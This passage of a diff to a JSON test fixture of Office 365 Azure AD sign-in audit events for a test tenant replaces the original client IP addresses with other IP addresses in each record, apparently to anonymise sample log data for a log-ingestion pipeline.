Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -304,10 +304,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:53:22", "ExtendedProperties": [ { @@ -357,7 +357,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -375,10 +375,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:23", "ExtendedProperties": [ { @@ -428,7 +428,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -446,10 +446,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:41", "ExtendedProperties": [ { @@ -499,7 +499,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -517,10 +517,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:22", "ExtendedProperties": [ { @@ -570,7 +570,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -588,10 +588,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:52:05", "ExtendedProperties": [ { @@ -641,7 +641,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -659,10 +659,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "5e3ce6c0-2b1f-4285-8d4b-75ee78787346", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:45", "ExtendedProperties": [ { @@ -712,7 +712,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -730,10 +730,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:51:49", "ExtendedProperties": [ { @@ -783,7 +783,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 